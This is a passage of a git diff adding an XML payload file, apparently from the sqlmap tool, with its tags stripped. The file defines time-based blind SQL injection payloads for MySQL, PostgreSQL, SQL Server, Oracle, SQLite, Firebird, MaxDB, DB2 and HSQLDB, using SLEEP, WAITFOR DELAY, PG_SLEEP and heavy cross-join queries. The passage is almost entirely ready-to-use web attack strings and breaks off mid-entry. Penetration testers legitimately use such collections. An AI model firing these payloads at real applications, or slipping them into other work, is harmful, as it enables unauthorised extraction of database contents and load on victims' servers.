+ ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
+
+ ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 2.0 stacked queries
+ 4
+ 4
+ 0
+ 0
+ 1
+ ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
+
+ ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 2.0
+
+
+
+
+
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
new file mode 100644
index 000000000..1d3ba16df
--- /dev/null
+++ b/xml/payloads/05_time_blind.xml
@@ -0,0 +1,1574 @@
+
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (SELECT)
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (SELECT - comment)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ AND SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 AND time-based blind (comment)
+ 5
+ 4
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ AND SLEEP([SLEEPTIME])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL < 5.0.12 AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL < 5.0.12 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+ #
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL > 8.1 AND time-based blind (comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+ --
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ PostgreSQL AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+ --
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind
+ 5
+ 1
+ 0
+ 0
+ 1
+ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+
+ WAITFOR DELAY '0:0:[SLEEPTIME]'
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle AND time-based blind
+ 5
+ 1
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (heavy query)
+ 5
+ 2
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+ --
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ SQLite > 2.0 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1
+ 1
+ AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+ --
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1
+ 1
+ AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ Firebird AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1
+ 1
+ AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+ --
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ SAP MaxDB AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+ --
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 AND time-based blind (heavy query)
+ 5
+ 3
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ IBM DB2 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+ --
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ HSQLDB >= 1.7.2 AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 AND time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+ HSQLDB > 2.0 AND time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind (SELECT)
+ 5
+ 1
+ 3
+ 1,2,3
+ 2
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind (SELECT - comment)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 OR time-based blind
+ 5
+ 2
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+
+ OR [RANDNUM]=SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL < 5.0.12 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
+
+ OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 OR time-based blind
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase OR time-based blind (heavy query)
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle OR time-based blind
+ 5
+ 3
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
+
+
+
+
+
+ Oracle
+
+
+
+
+ Oracle OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
+
+
+
+
+
+ Oracle
+
+
+
+
+ SQLite > 2.0 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1
+ 2
+ OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
+
+ OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
+
+
+
+
+
+ SQLite
+ > 2.0
+
+
+
+
+ Firebird OR time-based blind (heavy query)
+ 5
+ 5
+ 3
+ 1
+ 2
+ OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
+
+
+
+
+
+ Firebird
+ >= 2.0
+
+
+
+
+ SAP MaxDB OR time-based blind (heavy query - comment)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
+
+
+
+
+
+ SAP MaxDB
+
+
+
+
+ IBM DB2 OR time-based blind (heavy query)
+ 5
+ 4
+ 3
+ 1,2,3
+ 2
+ OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
+
+
+
+
+
+ IBM DB2
+
+
+
+
+ HSQLDB >= 1.7.2 OR time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ >= 1.7.2
+
+
+
+
+ HSQLDB > 2.0 OR time-based blind (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+ HSQLDB > 2.0 OR time-based blind (heavy query - comment)
+ 5
+ 5
+ 2
+ 1,2,3
+ 1
+ OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
+
+ OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
+ --
+
+
+
+
+
+ HSQLDB
+ > 2.0
+
+
+
+
+
+
+
+ MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
+ 5
+ 3
+ 1
+ 1,2,3,4,5
+ 1
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
+
+ PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+
+
+ MySQL > 5.0.11 time-based blind - Parameter replace (SELECT)
+ 5
+ 4
+ 1
+ 1,2,3
+ 3
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL > 5.0.11 time-based blind - Parameter replace (SELECT - comment)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+ (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.11
+
+
+
+
+ MySQL >= 5.0 time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL < 5.0 time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (bool*int)
+ 5
+ 4
+ 1
+ 1,2,3
+ 3
+ ([INFERENCE])*SLEEP([SLEEPTIME])
+
+ ([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (MAKE_SET)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))
+
+ MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+
+
+
+
+
+ MySQL
+
+
+
+
+ MySQL time-based blind - Parameter replace (ELT)
+ 5
+ 5
+ 1
+ 1,2,3
+ 3
+ ELT([INFERENCE],SLEEP([SLEEPTIME]))
+
+ ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+
+
+
+
+
+ MySQL
+
+
+
+
+ PostgreSQL > 8.1 time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,2,3
+ 3
+ (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
+
+ (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
+
+
+
+
+
+ PostgreSQL
+ > 8.1
+
+
+
+
+ PostgreSQL time-based blind - Parameter replace (heavy query)
+ 5
+ 4
+ 2
+ 1,2,3
+ 3
+ (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
+
+ (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
+
+
+
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - Parameter replace
+ 5
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
+ 5
+ 4
+ 2
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
+
